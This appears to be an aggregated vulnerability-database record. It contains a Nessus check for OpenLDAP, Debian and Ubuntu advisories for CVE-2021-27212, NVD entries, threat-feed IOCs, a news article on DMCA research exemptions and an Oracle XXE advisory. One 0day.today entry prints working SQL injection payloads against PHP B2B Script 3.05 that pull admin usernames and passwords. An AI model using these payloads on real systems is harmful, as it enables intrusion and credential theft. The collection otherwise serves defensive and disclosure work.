exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"ldap-utils\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libldap-2.4-2\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libldap-2.4-2-dbg\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libldap-common\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libldap2-dev\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"slapd\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"slapd-dbg\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"slapd-smbk5pwd\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2021-02-23T15:53:59", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27212"], "description": "Pasi Saarinen discovered that OpenLDAP incorrectly handled certain short \ntimestamps. A remote attacker could possibly use this issue to cause \nOpenLDAP to crash, resulting in a denial of service.", "edition": 2, "modified": "2021-02-22T00:00:00", "published": "2021-02-22T00:00:00", "id": "USN-4744-1", "href": "https://ubuntu.com/security/notices/USN-4744-1", "title": "OpenLDAP vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2021-02-24T01:18:25", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27212"], "description": "- -----------------------------------------------------------------------\nDebian LTS Advisory DLA-2574-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Utkarsh Gupta\nFebruary 21, 2021 https://wiki.debian.org/LTS\n- -----------------------------------------------------------------------\n\nPackage : openldap\nVersion : 2.4.44+dfsg-5+deb9u8\nCVE ID : CVE-2021-27212\n\nA vulnerability in the Certificate List Exact Assertion validation\nwas discovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. An unauthenticated remote attacker can\ntake advantage of this flaw to cause a denial of service (slapd\ndaemon crash) via specially crafted packets.\n\nFor Debian 9 stretch, this problem has been fixed in version\n2.4.44+dfsg-5+deb9u8.\n\nWe recommend that you upgrade your openldap packages.\n\nFor the detailed security status of openldap please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openldap\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2021-02-20T18:56:09", "published": "2021-02-20T18:56:09", "id": "DEBIAN:DLA-2574-1:CF471", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202102/msg00035.html", "title": "[SECURITY] [DLA 2574-1] openldap security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-24T01:30:06", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27212"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4860-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nFebruary 20, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openldap\nCVE ID : CVE-2021-27212\n\nA vulnerability in the Certificate List Exact Assertion validation was\ndiscovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. An unauthenticated remote attacker can take\nadvantage of this flaw to cause a denial of service (slapd daemon crash)\nvia specially crafted packets.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 2.4.47+dfsg-3+deb10u6.\n\nWe recommend that you upgrade your openldap packages.\n\nFor the detailed security status of openldap please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/openldap\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2021-02-20T13:01:20", "published": "2021-02-20T13:01:20", "id": "DEBIAN:DSA-4860-1:4287F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00041.html", "title": "[SECURITY] [DSA 4860-1] openldap security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "rst": [{"lastseen": "2021-02-14T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **27212[.]xc.mieseng.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-12T03:00:00, Last seen: 2021-02-14T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-12T00:00:00", "id": "RST:3BF2DB62-A85C-33F5-8989-D691A56E9EEB", "href": "", "published": "2021-02-15T00:00:00", "title": "RST Threat feed. IOC: 27212.xc.mieseng.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-15T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 27212.xc.mieseng.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-15T03:00:00, Last seen: 2021-02-15T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-15T00:00:00", "id": "RST:859A99FD-674A-304A-BAF3-5597819536E1", "href": "", "published": "2021-02-15T00:00:00", "title": "RST Threat feed. IOC: 0.0.0.0 27212.xc.mieseng.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-15T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 www.27212.xc.mieseng.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-15T03:00:00, Last seen: 2021-02-15T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-15T00:00:00", "id": "RST:702A0DF9-D0DE-3FD3-97B1-CA32D69EFF9A", "href": "", "published": "2021-02-15T00:00:00", "title": "RST Threat feed. IOC: 0.0.0.0 www.27212.xc.mieseng.com", "type": "rst", "cvss": {}}], "cve": [{"lastseen": "2021-02-23T14:38:19", "description": "In OpenLDAP through 2.4.57 and 2.5.x through 2.5.1alpha, an assertion failure in slapd can occur in the issuerAndThisUpdateCheck function via a crafted packet, resulting in a denial of service (daemon exit) via a short timestamp. This is related to schema_init.c and checkTime.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-02-14T03:15:00", "title": "CVE-2021-27212", "type": "cve", "cwe": ["CWE-617"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27212"], "modified": "2021-02-22T21:21:00", "cpe": ["cpe:/a:openldap:openldap:2.5.1", "cpe:/o:debian:debian_linux:10.0", "cpe:/a:openldap:openldap:2.5.0", "cpe:/a:openldap:openldap:2.4.57", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2021-27212", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27212", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:openldap:openldap:2.4.57:*:*:*:*:*:*:*", "cpe:2.3:a:openldap:openldap:2.5.1:alpha:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:openldap:openldap:2.5.0:alpha:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2018-04-12T03:49:46", "edition": 1, "description": "Exploit for php platform in category web applications", "published": "2017-03-06T00:00:00", "title": "PHP B2B Script 3.05 - SQL Injection Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-03-06T00:00:00", "href": "https://0day.today/exploit/description/27212", "id": "1337DAY-ID-27212", "sourceData": "# # # # # \r\n# Exploit Title: PHP B2B Script v3.05 - SQL Injection\r\n# Google Dork: N/A\r\n# Date: 06.03.2017\r\n# Vendor Homepage: http://www.phpscriptsmall.com/\r\n# Software : http://www.phpscriptsmall.com/product/php-b2b-script/\r\n# Demo: http://readymadeb2bscript.com/product/basic/\r\n# Version: 3.05\r\n# Tested on: Win7 x64, Kali Linux x64\r\n# # # # # \r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Mail : ihsan[@]ihsan[.]net\r\n# # # # #\r\n# SQL Injection/Exploit :\r\n# http://localhost/[PATH]/companyinfo.php?id=[SQL]\r\n# http://localhost/[PATH]/latest_selling_leads_details.php?bid=[SQL]\r\n# http://localhost/[PATH]/company_profile.php?id=[SQL]\r\n# For example;\r\n# -92'+/*!50000union*/+select+1,2,3,4,5,6,7,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17,18,19,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,21,22,23,24--+-\r\n# admin :username\r\n# admin :password\r\n# admin_login :id\r\n# admin_login :username\r\n# admin_login :password\r\n# -92'+/*!50000union*/+select+1,2,3,4,5,6,7,/*!50000ConCat(*/username,/*!50000char*/(58),password),9,10,11,12,13,14,15,16,17,18,19,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,21,22,23,24+from+admin--+-\r\n# Etc...\r\n# # # # #\n\n# 0day.today [2018-04-12] #", "sourceHref": "https://0day.today/exploit/27212", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:30", "bulletinFamily": "info", "cvelist": [], "description": "White hat hackers can breathe a little easier for the next two years because of a temporary removal of restrictions imposed on hacking of everything from cars, medical devices, to smart home appliances.\n\nLast week the U.S. Copyright Office temporarily removed certain restrictions imposed by the Digital Millennium Copyright Act (DMCA) that had long prevented researchers from circumventing protections, such as encryption, that restricted access to copyright protected material.\n\nThe move was met with applause by the research community that has long argued more cooperation is needed between device manufacturers and researchers.\n\n\u201cObviously, adversaries don\u2019t abide by regulations, so their ability to reverse engineer and figure out how to get into a device and find ways to exfiltrate data has been successful,\u201d said Anthony James, CMO with research firm TrapX. \u201cIn terms of opening up new opportunities for researchers, this is only good for the industry,\u201d James said. \u201cAs an industry we wait for an attacker to exploit a vulnerability that they have the time, resources and energy to discover. This allows researchers to be more proactive when it comes to building defenses.\u201d\n\nThe exemption lifts the longstanding \u201cprohibition against circumvention of technological measures that effectively control access to copyrighted works,\u201d according to the [U.S. Copyright Office and Library of Congress exemption](<https://www.federalregister.gov/documents/2015/10/28/2015-27212/exemption-to-prohibition-on-circumvention-of-copyright-protection-systems-for-access-control>) of the DMCA Section 1201 issued on Oct. 28.\n\nThe exemption applies to a wide range of research including automobiles, medical devices and consumer IoT devices and also allows the sharing of research data without fear of being sued.\n\nThat said, there are still restrictiosn on how far the research can go. For example, researchers can reverse engineer medical devices, but are restricted from accessing the Internet services used by those devices. Researchers can also tinker with a variety of IoT devices, but are restricted from accessing a computer they don\u2019t own. The exemption allows car hacking, but excludes breaking protections related to vehicle telematics and entertainment systems.\n\nIn addition, researchers are also faced with a \u201cgood-faith restrictions\u201d that if deemed in violation of, researchers could still face prosecution under the Computer Fraud and Abuse Act, said Craig Young, researcher at Tripwire.\n\n\u201cThere are still some restrictions that give me pause,\u201d Young said. \u201cHowever, from the perspective of a researcher, it\u2019s a good step forward. But whether it\u2019s gone far enough is the question.\u201d\n\nHe said even with these exemptions, researchers walk a fine legal line. \u201cThere are still some legal gray areas that exist. Maybe it\u2019s a tool for breaking the encryption on a firmware installation in a car or medical device or a tool for analyzing the traffic that goes through the CAN bus of a car.\u201d\n\nThe exemption to DMCA\u2019s Section 1201, despite its flaws, [said the Electronic Frontier Foundation](<https://www.eff.org/deeplinks/2016/10/why-did-we-have-wait-year-fix-our-cars>), \u201cwill promote security, innovation, and competition \u2013 and also help the next generation of engineers continue to learn by taking their devices apart to see how they work.\u201d\n\n\u201cReverse engineering and modifying software for security research purposes is something that\u2019s going to happen, DMCA exemption or not,\u201d said Corey Thuen, senior security consultant with IOActive, \u201cWith an exemption we now have the good guys doing it too, which is important for advancing cybersecurity as a whole.\u201d\n\nThuen said the exemptions would help projects such as the Open Garages vehicle research labs thrive. \u201cSupporting the end-users\u2019 ability to modify and alter their car is an interesting development in the ongoing conflict of \u2018owning\u2019 software vs \u2018licensing\u2019 software,\u201d he said.\n\nThe rule change met resistance from several companies and industry trade associations such as the Auto Alliance, Global Automakers, GM, John Deere, The Software Alliance, Intellectual Property Owners Association, and the National Association of Manufacturers. The exemptions are set to expire after two years, after which there will be a comment period for stakeholders to argue for an extension of the exemption to DMCA\u2019s Section 1201.\n", "modified": "2016-11-03T19:25:53", "published": "2016-11-03T15:25:53", "id": "THREATPOST:8ACB850E2F24B185C3D934BB3A6FDEBC", "href": "https://threatpost.com/dmca-exemptions-lift-hacking-restrictions/121782/", "type": "threatpost", "title": "DMCA Exemptions Lift Hacking Restriction", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
